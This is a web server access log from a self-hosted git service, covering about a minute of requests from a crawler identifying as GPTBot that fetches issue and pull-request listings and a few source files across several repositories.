+[17/Feb/2026:19:32:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13570] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:32:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13569] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:32:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:32:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:32:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:32:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:32:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:32:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:32:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:32:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" +[17/Feb/2026:19:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:32:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:32:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:32:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=open&type=all" +[17/Feb/2026:19:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:32:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:32:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11263] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:19:32:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:19:32:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:19:32:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:19:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:19:32:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:19:32:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:19:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:32:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:32:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:32:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:32:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:32:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:32:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:32:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:32:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:32:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=leastcomment&state=all&type=all" 